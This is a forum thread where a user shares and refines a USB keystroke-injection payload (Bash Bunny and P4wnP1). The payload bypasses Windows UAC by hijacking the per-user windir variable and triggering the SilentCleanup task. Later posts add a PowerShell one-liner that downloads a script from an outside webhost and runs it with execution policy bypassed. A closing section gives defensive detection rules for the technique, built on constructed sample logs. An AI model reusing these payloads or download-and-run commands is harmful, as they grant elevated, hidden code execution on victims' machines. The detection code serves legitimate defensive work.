KryptoKat Posted March 18, 2019

In theory, this Bash Bunny script should make a directory in C:\Windows called uac-bypassed. I have no way to test this specific script because I don't have a Bash Bunny or a Rubber Ducky, so I had to make do with a P4wnP1 A.L.O.A. Any help making this payload smaller would be greatly appreciated. (The command at the bottom is for the P4wnP1 A.L.O.A.)

Q GUI R
Q powershell
Q ENTER
Q DELAY 500
Q "echo \"if((([System.Security.Principal.WindowsIdentity]::GetCurrent()).groups -match `\"S-1-5-32-544`\")) { mkdir c:\\windows\\uac-bypassed } else { `$registryPath = `\"HKCU:\\Environment`\"; `$Name = `\"windir`\"; `$Value = `\"powershell -ep bypass -w h `$PSCommandPath;#`\"; Set-ItemProperty -Path `$registryPath -Name `$name -Value `$Value; schtasks /run /tn \\Microsoft\\Windows\\DiskCleanup\\SilentCleanup /I | Out-Null; Remove-ItemProperty -Path `$registryPath -Name `$name; }\" > uac.ps1"
Q ENTER
Q Set-ExecutionPolicy RemoteSigned -Scope CurrentUser
Q ENTER
Q DELAY 500
Q a
Q .\\uac.ps1
Q ENTER
Q rmdir uac.ps1
Q ENTER
Q Set-ExecutionPolicy Undefined -Scope CurrentUser
Q ENTER
Q DELAY 500
Q a
Q ENTER
Q exit
Q ENTER

P4wnP1_cli hid run -c 'layout("us"); typingSpeed(15,0); press("GUI R"); type("powershell"); press("ENTER"); delay(500); type(" echo \"if((([System.Security.Principal.WindowsIdentity]::GetCurrent()).groups -match `\"S-1-5-32-544`\")) { mkdir c:\\windows\\uac-bypassed } else { `$registryPath = `\"HKCU:\\Environment`\"; `$Name = `\"windir`\"; `$Value = `\"powershell -ep bypass -w h `$PSCommandPath;#`\"; Set-ItemProperty -Path `$registryPath -Name `$name -Value `$Value; schtasks /run /tn \\Microsoft\\Windows\\DiskCleanup\\SilentCleanup /I | Out-Null; Remove-ItemProperty -Path `$registryPath -Name `$name; }\" > uac.ps1"); press("ENTER"); type("Set-ExecutionPolicy RemoteSigned -Scope CurrentUser"); press("ENTER"); delay(500); type("a"); press("ENTER"); type(".\\uac.ps1"); press("ENTER"); type("rmdir uac.ps1"); press("ENTER"); type("Set-ExecutionPolicy Undefined -Scope CurrentUser"); press("ENTER"); delay(500); type("a"); press("ENTER"); type("exit"); press("ENTER");'
KryptoKat (Author) Posted March 19, 2019

---UPDATE---
I've simplified the script to:

powershell -w h curl -OutFile '%USERPROFILE%\uac.ps1' 'petrolic-designator.000webhostapp.com/uac.txt';

However, I'm having trouble running the file in the same line; any help would be greatly appreciated.
KryptoKat (Author) Posted March 20, 2019

---UPDATE---
I finally got the PowerShell script functioning. In theory, this should work on any account because everyone has access to C:\Windows\Temp:

powershell -w h -ep bypass curl -OutFile 'C:\Windows\Temp\uac.ps1' 'petrolic-designator.000webhostapp.com/uac.txt'; C:\Windows\Temp\uac.ps1

Now to find something useful to do with this.
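The bypass in the first post works by writing a per-user windir value into HKCU\Environment and then triggering the auto-elevating SilentCleanup scheduled task. Below is an added detection example from the defender's side, not code from the thread or from the P4wnP1 project: it runs two rules over constructed Sysmon-style events (ID 13 registry value set, ID 1 process creation; the field names follow Sysmon's schema, the sample records are made up) and correlates them per user within a short window.

```python
import re
from datetime import datetime, timedelta

# Constructed sample telemetry, not real logs: one hijack sequence by "alice",
# plus a benign per-user Path edit by "bob" that must not alert.
SAMPLE_EVENTS = [
    {"EventID": 13, "UtcTime": "2019-03-18 10:00:01", "User": "HOST\\alice",
     "TargetObject": "HKU\\S-1-5-21-1111\\Environment\\windir",
     "Details": "powershell -ep bypass -w h C:\\Windows\\Temp\\uac.ps1;#"},
    {"EventID": 1, "UtcTime": "2019-03-18 10:00:02", "User": "HOST\\alice",
     "Image": "C:\\Windows\\System32\\schtasks.exe",
     "CommandLine": "schtasks /run /tn \\Microsoft\\Windows\\DiskCleanup\\SilentCleanup /I"},
    {"EventID": 13, "UtcTime": "2019-03-18 11:30:00", "User": "HOST\\bob",
     "TargetObject": "HKU\\S-1-5-21-2222\\Environment\\Path",
     "Details": "C:\\Users\\bob\\bin"},
]

# windir is a machine-wide variable; a copy appearing in a user hive is itself suspicious.
WINDIR_RE = re.compile(r"^HKU\\[^\\]+\\Environment\\windir$", re.IGNORECASE)
SILENTCLEANUP_RE = re.compile(r"/run\b.*SilentCleanup", re.IGNORECASE)

def registry_hits(events):
    """Rule 1: per-user override of windir (registry value set events only)."""
    return [e for e in events
            if e["EventID"] == 13 and WINDIR_RE.match(e.get("TargetObject", ""))]

def task_hits(events):
    """Rule 2: schtasks.exe manually starting the auto-elevating SilentCleanup task."""
    return [e for e in events
            if e["EventID"] == 1
            and e.get("Image", "").lower().endswith("\\schtasks.exe")
            and SILENTCLEANUP_RE.search(e.get("CommandLine", ""))]

def correlate(events, window_seconds=60):
    """High-confidence alert: same user sets windir, then runs the task within the window."""
    fmt = "%Y-%m-%d %H:%M:%S"
    alerts = []
    for reg in registry_hits(events):
        t0 = datetime.strptime(reg["UtcTime"], fmt)
        for task in task_hits(events):
            delta = datetime.strptime(task["UtcTime"], fmt) - t0
            if task["User"] == reg["User"] and timedelta(0) <= delta <= timedelta(seconds=window_seconds):
                alerts.append({"user": reg["User"], "windir_value": reg["Details"],
                               "task_cmd": task["CommandLine"]})
    return alerts

if __name__ == "__main__":
    for a in correlate(SAMPLE_EVENTS):
        print(f"ALERT user={a['user']} windir={a['windir_value']!r} via {a['task_cmd']!r}")
```

Either rule alone is a useful medium-confidence signal; the correlated pair is what distinguishes this sequence from an ordinary environment-variable edit.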